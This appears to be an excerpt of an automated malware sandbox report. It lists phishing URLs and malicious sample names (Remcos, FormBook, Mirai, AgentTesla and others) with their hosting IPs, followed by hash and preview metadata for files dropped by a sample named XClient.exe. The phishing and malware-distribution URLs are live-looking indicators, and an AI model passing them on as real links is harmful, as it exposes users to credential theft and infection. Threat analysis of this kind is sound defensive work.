                                                                                PO.78NO9.xlsGet hashmaliciousFormBookBrowse
                                                                                • 185.199.108.133
                                                                                Company Profile.vbsGet hashmaliciousUnknownBrowse
                                                                                • 185.199.108.133
                                                                                ls6sm8RNqn.rtfGet hashmaliciousRemcosBrowse
                                                                                • 185.199.109.133
                                                                                na.rtfGet hashmaliciousRemcosBrowse
                                                                                • 185.199.109.133
                                                                                na.rtfGet hashmaliciousRemcosBrowse
                                                                                • 185.199.109.133
                                                                                na.rtfGet hashmaliciousRemcosBrowse
                                                                                • 185.199.111.133
                                                                                na.rtfGet hashmaliciousRemcosBrowse
                                                                                • 185.199.111.133
                                                                                na.rtfGet hashmaliciousRemcosBrowse
                                                                                • 185.199.109.133
                                                                                na.htaGet hashmaliciousCobalt StrikeBrowse
                                                                                • 185.199.111.133
                                                                                fp2e7a.wpc.phicdn.nethttp://netflix-n-chill.vercel.app/Get hashmaliciousHTMLPhisherBrowse
                                                                                • 192.229.221.95
                                                                                http://logiamutusliber.com.ar/dan/gbsourcesGet hashmaliciousHTMLPhisherBrowse
                                                                                • 192.229.221.95
                                                                                https://allegrolokalnie.p24-v990d8a01.pl/oferta/df10e59f-ef1b-4d67-8f86-5b7cf2069508Get hashmaliciousUnknownBrowse
                                                                                • 192.229.221.95
                                                                                https://ipfs.io/ipfs/bafkreibgdbnu3tuzgf67i4df7bjrmnd32cxot5fwvnixsiomyn2sw6sfruGet hashmaliciousHTMLPhisherBrowse
                                                                                • 192.229.221.95
                                                                                https://pub-3b380a6d506e4fdbb1786f239cfe3be3.r2.dev/index.htmlGet hashmaliciousHTMLPhisherBrowse
                                                                                • 192.229.221.95
                                                                                https://pub-798464f3fd9d44d0b3d15c59379a2110.r2.dev/index.htmlGet hashmaliciousHTMLPhisherBrowse
                                                                                • 192.229.221.95
                                                                                https://pub-f3fd7582ff8a4d27a648a25dda05fecf.r2.dev/index.htmlGet hashmaliciousHTMLPhisherBrowse
                                                                                • 192.229.221.95
                                                                                https://pub-b60bbcf7edd9477a8f686caa270d9f9c.r2.dev/index.htmlGet hashmaliciousHTMLPhisherBrowse
                                                                                • 192.229.221.95
                                                                                https://pub-d55459157ebb42a9815eb5a80662b7e8.r2.dev/index.htmlGet hashmaliciousHTMLPhisherBrowse
                                                                                • 192.229.221.95
                                                                                http://tiktok1api.goodpay.buzz/Get hashmaliciousUnknownBrowse
                                                                                • 192.229.221.95
                                                                                MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                CLOUDFLARENETUS2i3Lj7a8Gk.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                • 188.114.96.3
                                                                                http://netflix-n-chill.vercel.app/Get hashmaliciousHTMLPhisherBrowse
                                                                                • 104.18.22.19
                                                                                https://allegrolokalnie.p24-v990d8a01.pl/oferta/df10e59f-ef1b-4d67-8f86-5b7cf2069508Get hashmaliciousUnknownBrowse
                                                                                • 188.114.97.3
                                                                                https://vvtx.org/q76938a7ap0b7d49301b74285fc262c0b4e8.html&data=05/Get hashmaliciousUnknownBrowse
                                                                                • 104.26.9.233
                                                                                https://pub-3b380a6d506e4fdbb1786f239cfe3be3.r2.dev/index.htmlGet hashmaliciousHTMLPhisherBrowse
                                                                                • 104.17.25.14
                                                                                https://pub-798464f3fd9d44d0b3d15c59379a2110.r2.dev/index.htmlGet hashmaliciousHTMLPhisherBrowse
                                                                                • 104.17.25.14
                                                                                https://pub-ed4436928a0f4db6a9860bf39f13ccf7.r2.dev/index.htmlGet hashmaliciousHTMLPhisherBrowse
                                                                                • 104.17.25.14
                                                                                https://pub-f3fd7582ff8a4d27a648a25dda05fecf.r2.dev/index.htmlGet hashmaliciousHTMLPhisherBrowse
                                                                                • 104.17.25.14
                                                                                https://pub-b60bbcf7edd9477a8f686caa270d9f9c.r2.dev/index.htmlGet hashmaliciousHTMLPhisherBrowse
                                                                                • 104.17.25.14
                                                                                https://pub-d55459157ebb42a9815eb5a80662b7e8.r2.dev/index.htmlGet hashmaliciousHTMLPhisherBrowse
                                                                                • 104.17.25.14
                                                                                NET1-ASBGhttps://swissquotech.com/swissquote-2024.zipGet hashmaliciousPhisherBrowse
                                                                                • 87.121.45.6
                                                                                mipsel.nn.elfGet hashmaliciousOkiruBrowse
                                                                                • 93.123.85.166
                                                                                arm7.nn.elfGet hashmaliciousMirai, OkiruBrowse
                                                                                • 93.123.85.166
                                                                                x86_32.nn.elfGet hashmaliciousOkiruBrowse
                                                                                • 93.123.85.166
                                                                                x86_64.nn.elfGet hashmaliciousOkiruBrowse
                                                                                • 93.123.85.166
                                                                                mips.nn.elfGet hashmaliciousOkiruBrowse
                                                                                • 93.123.85.166
                                                                                arm5.nn.elfGet hashmaliciousOkiruBrowse
                                                                                • 93.123.85.166
                                                                                arm.nn.elfGet hashmaliciousOkiruBrowse
                                                                                • 93.123.85.166
                                                                                SecuriteInfo.com.Linux.Siggen.9999.9437.5075.elfGet hashmaliciousMiraiBrowse
                                                                                • 93.123.85.221
                                                                                SecuriteInfo.com.Linux.Siggen.9999.13181.28360.elfGet hashmaliciousMiraiBrowse
                                                                                • 93.123.85.221
                                                                                FASTLYUShttp://netflix-n-chill.vercel.app/Get hashmaliciousHTMLPhisherBrowse
                                                                                • 151.101.129.229
                                                                                http://logiamutusliber.com.ar/dan/gbsourcesGet hashmaliciousHTMLPhisherBrowse
                                                                                • 199.232.192.193
                                                                                https://pub-3b380a6d506e4fdbb1786f239cfe3be3.r2.dev/index.htmlGet hashmaliciousHTMLPhisherBrowse
                                                                                • 185.199.108.153
                                                                                https://pub-798464f3fd9d44d0b3d15c59379a2110.r2.dev/index.htmlGet hashmaliciousHTMLPhisherBrowse
                                                                                • 185.199.108.153
                                                                                https://pub-ed4436928a0f4db6a9860bf39f13ccf7.r2.dev/index.htmlGet hashmaliciousHTMLPhisherBrowse
                                                                                • 185.199.110.153
                                                                                https://pub-f3fd7582ff8a4d27a648a25dda05fecf.r2.dev/index.htmlGet hashmaliciousHTMLPhisherBrowse
                                                                                • 185.199.108.153
                                                                                https://pub-b60bbcf7edd9477a8f686caa270d9f9c.r2.dev/index.htmlGet hashmaliciousHTMLPhisherBrowse
                                                                                • 185.199.108.153
                                                                                https://pub-d55459157ebb42a9815eb5a80662b7e8.r2.dev/index.htmlGet hashmaliciousHTMLPhisherBrowse
                                                                                • 185.199.110.153
                                                                                https://sneamcomnnumnlty.com/hfjf748934924/geting/putGet hashmaliciousUnknownBrowse
                                                                                • 151.101.130.137
                                                                                http://emaildlatt-mailcom-28e2uy93.weeblysite.com/Get hashmaliciousHTMLPhisherBrowse
                                                                                • 151.101.129.44
                                                                                MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                1138de370e523e824bbca92d049a3777https://allegrolokalnie.p24-v990d8a01.pl/oferta/df10e59f-ef1b-4d67-8f86-5b7cf2069508Get hashmaliciousUnknownBrowse
                                                                                • 23.206.229.226
                                                                                https://pub-3b380a6d506e4fdbb1786f239cfe3be3.r2.dev/index.htmlGet hashmaliciousHTMLPhisherBrowse
                                                                                • 23.206.229.226
                                                                                https://pub-798464f3fd9d44d0b3d15c59379a2110.r2.dev/index.htmlGet hashmaliciousHTMLPhisherBrowse
                                                                                • 23.206.229.226
                                                                                https://pub-d55459157ebb42a9815eb5a80662b7e8.r2.dev/index.htmlGet hashmaliciousHTMLPhisherBrowse
                                                                                • 23.206.229.226
                                                                                http://tiktok1api.goodpay.buzz/Get hashmaliciousUnknownBrowse
                                                                                • 23.206.229.226
                                                                                https://meta.case-page-appeal.eu/community-standard/343206939073499Get hashmaliciousUnknownBrowse
                                                                                • 23.206.229.226
                                                                                file.exeGet hashmaliciousCredential FlusherBrowse
                                                                                • 23.206.229.226
                                                                                file.exeGet hashmaliciousVidarBrowse
                                                                                • 23.206.229.226
                                                                                maizu v1.4.exeGet hashmaliciousLummaCBrowse
                                                                                • 23.206.229.226
                                                                                p7SnjaA8NN.exeGet hashmaliciousLummaC, Amadey, Credential Flusher, Stealc, VidarBrowse
                                                                                • 23.206.229.226
                                                                                3b5074b1b5d032e5620f69f9f700ff0e2i3Lj7a8Gk.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                • 188.114.97.3
                                                                                • 185.199.108.133
                                                                                http://netflix-n-chill.vercel.app/Get hashmaliciousHTMLPhisherBrowse
                                                                                • 188.114.97.3
                                                                                • 185.199.108.133
                                                                                https://ipfs.io/ipfs/bafkreibgdbnu3tuzgf67i4df7bjrmnd32cxot5fwvnixsiomyn2sw6sfruGet hashmaliciousHTMLPhisherBrowse
                                                                                • 188.114.97.3
                                                                                • 185.199.108.133
                                                                                https://sneamcomnnumnlty.com/hfjf748934924/geting/putGet hashmaliciousUnknownBrowse
                                                                                • 188.114.97.3
                                                                                • 185.199.108.133
                                                                                https://attachmentattt.netlify.app/Get hashmaliciousUnknownBrowse
                                                                                • 188.114.97.3
                                                                                • 185.199.108.133
                                                                                http://emaildlatt-mailcom-28e2uy93.weeblysite.com/Get hashmaliciousHTMLPhisherBrowse
                                                                                • 188.114.97.3
                                                                                • 185.199.108.133
                                                                                http://www.mallpurchase.com/Get hashmaliciousUnknownBrowse
                                                                                • 188.114.97.3
                                                                                • 185.199.108.133
                                                                                DHL_Shipment_Details_8th_October.pdf.exeGet hashmaliciousAgentTeslaBrowse
                                                                                • 188.114.97.3
                                                                                • 185.199.108.133
                                                                                Request For Quotation.jsGet hashmaliciousAgentTeslaBrowse
                                                                                • 188.114.97.3
                                                                                • 185.199.108.133
                                                                                Company Profile.vbsGet hashmaliciousUnknownBrowse
                                                                                • 188.114.97.3
                                                                                • 185.199.108.133
                                                                                MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                C:\Users\user\AppData\Local\XClient.exeSecuriteInfo.com.Win32.Malware-gen.18298.24659.exeGet hashmaliciousRemcosBrowse
                                                                                  RqYh.exeGet hashmaliciousRemcosBrowse
                                                                                    setup.exeGet hashmaliciousXWormBrowse
                                                                                      cinxa7dbiq.exeGet hashmaliciousAgentTeslaBrowse
                                                                                        7va1lgSJFv.exeGet hashmaliciousDCRat, PureLog Stealer, zgRATBrowse
                                                                                          SecuriteInfo.com.Trojan.Siggen18.41021.9404.23168.exeGet hashmaliciousSmokeLoaderBrowse
                                                                                            LisectAVT_2403002A_60.exeGet hashmaliciousAZORult, NetWireBrowse
                                                                                              LisectAVT_2403002A_348.exeGet hashmaliciousNjratBrowse
                                                                                                af0b876a436452a6e998fc622493aaa4553bcc53864d66a6a6d5d476a85902eb_dump1.exeGet hashmaliciousNanocore, RemcosBrowse
                                                                                                  Db1Z06qMmP6G0Dk.exeGet hashmaliciousRemcos, PureLog StealerBrowse
                                                                                                    Process:C:\Windows\SysWOW64\WerFault.exe
                                                                                                    File Type:Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                                                                                    Category:dropped
                                                                                                    Size (bytes):65536
                                                                                                    Entropy (8bit):1.2634169240935986
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:192:qENcOr/6TcW0BU/Ka67PHj+RSzuiFSZ24IO8m:Vlz6T+BU/Ka+bASzuiFSY4IO8m
                                                                                                    MD5:8BE3F4CED2C678216F01C558CAC4C5C3
                                                                                                    SHA1:5BF091B2FA909A5EF8A0F14F089808510E42E161
                                                                                                    SHA-256:6F07759EE24D50EACDFD9A148D5049BC153711B625DB0DCCC116D4BBEFF887F0
                                                                                                    SHA-512:18D1167DAFE78ABFE0E8E7AD4AE697635711B7D83BB9F4817A5847060B4395C62145D20724D49FFB9780F5E7079EADD304B9AAA994EA4EFDF9DE6E310FFEB1FE
                                                                                                    Malicious:false
                                                                                                    Preview:..V.e.r.s.i.o.n.=.1.....E.v.e.n.t.T.y.p.e.=.C.L.R.2.0.r.3.....E.v.e.n.t.T.i.m.e.=.1.3.3.7.2.7.5.7.8.7.3.7.3.9.1.7.0.7.....R.e.p.o.r.t.T.y.p.e.=.2.....C.o.n.s.e.n.t.=.1.....U.p.l.o.a.d.T.i.m.e.=.1.3.3.7.2.7.5.7.8.7.5.3.0.1.6.5.5.8.....R.e.p.o.r.t.S.t.a.t.u.s.=.5.2.4.3.8.4.....R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.1.4.9.2.8.d.b.5.-.9.7.9.f.-.4.6.5.0.-.8.a.e.6.-.2.e.d.8.a.5.9.6.5.f.a.2.....I.n.t.e.g.r.a.t.o.r.R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.0.d.0.9.d.c.5.3.-.9.f.b.5.-.4.5.9.7.-.a.4.a.b.-.d.7.7.7.4.a.9.8.1.3.5.d.....W.o.w.6.4.H.o.s.t.=.3.4.4.0.4.....W.o.w.6.4.G.u.e.s.t.=.3.3.2.....N.s.A.p.p.N.a.m.e.=.M.S.B.u.i.l.d...e.x.e.....O.r.i.g.i.n.a.l.F.i.l.e.n.a.m.e.=.M.S.B.u.i.l.d...e.x.e.....A.p.p.S.e.s.s.i.o.n.G.u.i.d.=.0.0.0.0.0.9.5.c.-.0.0.0.1.-.0.0.1.4.-.9.8.7.0.-.8.e.0.5.8.6.1.8.d.b.0.1.....T.a.r.g.e.t.A.p.p.I.d.=.W.:.0.0.0.0.f.5.1.9.f.e.e.c.4.8.6.d.e.8.7.e.d.7.3.c.b.9.2.d.3.c.a.c.8.0.2.4.0.0.0.0.0.0.0.0.!.0.0.0.0.e.6.2.5.6.a.0.1.5.9.6.8.8.f.0.5.6.0.b.0.1.5.d.a.4.d.9.6.7.f.4.1.c.b.f.8.c.9.b.d.
                                                                                                    Process:C:\Windows\SysWOW64\WerFault.exe
                                                                                                    File Type:Mini DuMP crash report, 15 streams, Mon Oct 7 06:57:54 2024, 0x1205a4 type
                                                                                                    Category:dropped
                                                                                                    Size (bytes):354964
                                                                                                    Entropy (8bit):3.594038650984217
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:3072:GZmHxq6vlc4uEq0yPLTgBLRdiU9yayYUJgtHz+vFNq0Yxa7:Gaxq6vlc49yjTgVRdil2tHz+tNJYQ
                                                                                                    MD5:B40203753DC40869FB373FB5211054EF
                                                                                                    SHA1:E91D4C777763487F5E1FCA1DFE4101280AEA1D36
                                                                                                    SHA-256:D3AB549ED3942670F97312A157DD1ABBC55F73130F27DF6F2ACEC162501A6691
                                                                                                    SHA-512:8D65ED7A1B6997788AF8C56865F4D34D4F644946B1222A12A7CEAA8D6E1EE473BAC7F684B1EBEFAB8CA277F3CAAF7C619DC70637338546A63EF284EB0FD5E167
                                                                                                    Malicious:false
                                                                                                    Preview:MDMP..a..... .......r..g............4............#..H.......$...(........,...m..........`.......8...........T...........8K..\...........L...........80..............................................................................eJ.......0......GenuineIntel............T.......\......g............................. ..............,...E.a.s.t.e.r.n. .S.t.a.n.d.a.r.d. .T.i.m.e...........................................E.a.s.t.e.r.n. .S.u.m.m.e.r. .T.i.m.e...............................................1.9.0.4.1...1...a.m.d.6.4.f.r.e...v.b._.r.e.l.e.a.s.e...1.9.1.2.0.6.-.1.4.0.6.......................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                    Process:C:\Windows\SysWOW64\WerFault.exe
                                                                                                    File Type:XML 1.0 document, Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                                                                                    Category:dropped
                                                                                                    Size (bytes):6370
                                                                                                    Entropy (8bit):3.7132266869471087
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:192:R6l7wVeJn16CYZXIcprj89bndPmsfI1Fm:R6lXJ16CYJIlndNfwI
                                                                                                    MD5:6E19C1582AF93B9F5159FD983D62FEC1
                                                                                                    SHA1:EFE1DE5D8DEBEEDBDE580D4F88A4517B94BFBAA6
                                                                                                    SHA-256:AAE74BF5B1CEB0F9889A63F6BC0432AACCB90805F370051CD019C3768A935AB0
                                                                                                    SHA-512:BB34AB26AB05C90E1C98724E66673FD75BA17213660930B500B2143D8B2E94D9B45E36891698CF232EE6E31C70DCC12939FA6D5FA2B588E53F9A143DC2C794DB
                                                                                                    Malicious:false
                                                                                                    Preview:..<.?.x.m.l. .v.e.r.s.i.o.n.=.".1...0.". .e.n.c.o.d.i.n.g.=.".U.T.F.-.1.6.".?.>.....<.W.E.R.R.e.p.o.r.t.M.e.t.a.d.a.t.a.>.......<.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.........<.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.1.0...0.<./.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.........<.B.u.i.l.d.>.1.9.0.4.5.<./.B.u.i.l.d.>.........<.P.r.o.d.u.c.t.>.(.0.x.3.0.).:. .W.i.n.d.o.w.s. .1.0. .P.r.o.<./.P.r.o.d.u.c.t.>.........<.E.d.i.t.i.o.n.>.P.r.o.f.e.s.s.i.o.n.a.l.<./.E.d.i.t.i.o.n.>.........<.B.u.i.l.d.S.t.r.i.n.g.>.1.9.0.4.1...2.0.0.6...a.m.d.6.4.f.r.e...v.b._.r.e.l.e.a.s.e...1.9.1.2.0.6.-.1.4.0.6.<./.B.u.i.l.d.S.t.r.i.n.g.>.........<.R.e.v.i.s.i.o.n.>.2.0.0.6.<./.R.e.v.i.s.i.o.n.>.........<.F.l.a.v.o.r.>.M.u.l.t.i.p.r.o.c.e.s.s.o.r. .F.r.e.e.<./.F.l.a.v.o.r.>.........<.A.r.c.h.i.t.e.c.t.u.r.e.>.X.6.4.<./.A.r.c.h.i.t.e.c.t.u.r.e.>.........<.L.C.I.D.>.2.0.5.7.<./.L.C.I.D.>.......<./.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.......<.P.r.o.c.e.s.s.I.n.f.o.r.m.a.t.i.o.n.>.........<.P.i.d.>.2.3.9.6.<./.P.i.
                                                                                                    Process:C:\Windows\SysWOW64\WerFault.exe
                                                                                                    File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                                                                    Category:dropped
                                                                                                    Size (bytes):4721
                                                                                                    Entropy (8bit):4.4494517403498675
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:48:cvIwWl8zsqJg77aI9KVWpW8VYuYm8M4J84ZF4+q8vu4omLnd:uIjf4I7Ak7VaJB0KbomLnd
                                                                                                    MD5:62D3ED612EA62C28DA2D52764B02E014
                                                                                                    SHA1:CACD4C4261D244A242EDBE97237970A4484A9170
                                                                                                    SHA-256:27B0445A4304E655C4FC8B9747AA3607EEA184A0D076DB24921668754C767372
                                                                                                    SHA-512:F431C7A850FBDF6E5816BBBD6F1375BF54A96EFD7642BD6EC2B423A50D22BE573D40D1D3FCF827DCAC6725473BC834B1D93A243A2742AF2C9262B47C05C81EA4
                                                                                                    Malicious:false
                                                                                                    Preview:<?xml version="1.0" encoding="UTF-8" standalone="yes"?>..<req ver="2">.. <tlm>.. <src>.. <desc>.. <mach>.. <os>.. <arg nm="vermaj" val="10" />.. <arg nm="vermin" val="0" />.. <arg nm="verbld" val="19045" />.. <arg nm="vercsdbld" val="2006" />.. <arg nm="verqfe" val="2006" />.. <arg nm="csdbld" val="2006" />.. <arg nm="versp" val="0" />.. <arg nm="arch" val="9" />.. <arg nm="lcid" val="2057" />.. <arg nm="geoid" val="223" />.. <arg nm="sku" val="48" />.. <arg nm="domain" val="0" />.. <arg nm="prodsuite" val="256" />.. <arg nm="ntprodtype" val="1" />.. <arg nm="platid" val="2" />.. <arg nm="tmsi" val="532680" />.. <arg nm="osinsty" val="1" />.. <arg nm="iever" val="11.789.19041.0-11.0.1000" />.. <arg nm="portos" val="0" />.. <arg nm="ram" val="409
                                                                                                    Process:C:\Users\user\AppData\Local\XClient.exe
                                                                                                    File Type:ASCII text, with CRLF line terminators
                                                                                                    Category:modified
                                                                                                    Size (bytes):841
                                                                                                    Entropy (8bit):5.351831766340675
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:24:ML9E4KlKDE4KhKiKhPKIE4oKNzKoIvEE4xDqE4j:MxHKlYHKh3oPtHo6wvEHxDqHj
                                                                                                    MD5:98DCC730A3C77DCDCA7CD8717EB5D42A
                                                                                                    SHA1:639509210C17EB73F5DB581FA8CA46B1157D8806
                                                                                                    SHA-256:E3C80885BCC7FE4F349EFB0470D261E0DE273EE26D47AF09C79F1B4B2F891E49
                                                                                                    SHA-512:7D11C53167839D428DAE35BF759C73FC0C7C49F2DE35CC99E4F8B69CDD40DFBEEF6D355F15FAB1EED62A64AF94E7BA311C0F8E07C3DA6F3A63410CC3E9882B78
                                                                                                    Malicious:false
                                                                                                    Preview:1,"fusion","GAC",0..1,"WinRT","NotApp",1..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System\920e3d1d70447c3c10e69e6df0766568\System.ni.dll",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Core\8b2c1203fd20aea8260bfbc518004720\System.Core.ni.dll",0..3,"System.Configuration, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Configuration\2192b0d5aa4aa14486ae08118d3b9fcc\System.Configuration.ni.dll",0..2,"Microsoft.Build.Framework, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a",0..2,"Microsoft.Build, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a",0..
                                                                                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                    File Type:data
                                                                                                    Category:dropped
                                                                                                    Size (bytes):64
                                                                                                    Entropy (8bit):0.34726597513537405
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:3:Nlll:Nll
                                                                                                    MD5:446DD1CF97EABA21CF14D03AEBC79F27
                                                                                                    SHA1:36E4CC7367E0C7B40F4A8ACE272941EA46373799
                                                                                                    SHA-256:A7DE5177C68A64BD48B36D49E2853799F4EBCFA8E4761F7CC472F333DC5F65CF
                                                                                                    SHA-512:A6D754709F30B122112AE30E5AB22486393C5021D33DA4D1304C061863D2E1E79E8AEB029CAE61261BB77D0E7BECD53A7B0106D6EA4368B4C302464E3D941CF7
                                                                                                    Malicious:false
                                                                                                    Preview:@...e...........................................................
                                                                                                    Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
                                                                                                    File Type:ASCII text, with CRLF line terminators
                                                                                                    Category:dropped
                                                                                                    Size (bytes):97
                                                                                                    Entropy (8bit):4.628206946059817
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:3:rRSFYJKXzovNsr4ryyAFkjDCHyg4E2J59mXtNX/Fsra:EFYJKDoWrcyyAFkPCHhJ23ktNura
                                                                                                    MD5:431B40803F274CF56B38D83762D9E6A3
                                                                                                    SHA1:85C84665F4E02470F1572ECE8F216A7F14C93F66
                                                                                                    SHA-256:67EE8143709045561D43103184A754AD5273B467206C53AC5B8B0DF95AC7F6A5
                                                                                                    SHA-512:7EC594DC6AA166D8177C9C36472B21674DF2B7D2AE2C16674F4D3134435BFC8995CD97DFB1E87E97A86A68A858C46E5DC4450D1938F505734F004412B339FC39
                                                                                                    Malicious:false
                                                                                                    Preview:....### explorer ###..[WIN]r[WIN]r....### C:\Users\user\AppData\Local\XClient.exe ###..[WIN]r
                                                                                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                    File Type:ASCII text, with no line terminators
                                                                                                    Category:dropped
                                                                                                    Size (bytes):60
                                                                                                    Entropy (8bit):4.038920595031593
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                    MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                    SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                    SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                    SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                    Malicious:false
                                                                                                    Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                    File Type:ASCII text, with no line terminators
                                                                                                    Category:dropped
                                                                                                    Size (bytes):60
                                                                                                    Entropy (8bit):4.038920595031593
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                    MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                    SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                    SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                    SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                    Malicious:false
                                                                                                    Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                    File Type:ASCII text, with no line terminators
                                                                                                    Category:dropped
                                                                                                    Size (bytes):60
                                                                                                    Entropy (8bit):4.038920595031593
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                    MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                    SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                    SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                    SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                    Malicious:false
                                                                                                    Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                    File Type:ASCII text, with no line terminators
                                                                                                    Category:dropped
                                                                                                    Size (bytes):60
                                                                                                    Entropy (8bit):4.038920595031593
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                    MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                    SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                    SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                    SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                    Malicious:false
                                                                                                    Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                    File Type:ASCII text, with no line terminators
                                                                                                    Category:dropped
                                                                                                    Size (bytes):60
                                                                                                    Entropy (8bit):4.038920595031593
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                    MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                    SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                    SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                    SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                    Malicious:false
                                                                                                    Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                    File Type:ASCII text, with no line terminators
                                                                                                    Category:dropped
                                                                                                    Size (bytes):60
                                                                                                    Entropy (8bit):4.038920595031593
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                    MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                    SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                    SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                    SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                    Malicious:false
                                                                                                    Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                                    Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
                                                                                                    File Type:PE32 executable (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                    Category:dropped
                                                                                                    Size (bytes):262432
                                                                                                    Entropy (8bit):6.179415524830389
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:3072:7a0t0yH5wCwie3NnQNLpj/Wnqvsw2XpFU4rwOeTubZSzf02RFihx2uzj:m0ny3nnKpqnZRXfw702birr/
                                                                                                    MD5:8FDF47E0FF70C40ED3A17014AEEA4232
                                                                                                    SHA1:E6256A0159688F0560B015DA4D967F41CBF8C9BD
                                                                                                    SHA-256:ED9884BAC608C06B7057037CC91D90E4AE5F74DD2DBCE2AF476699C6D4492D82
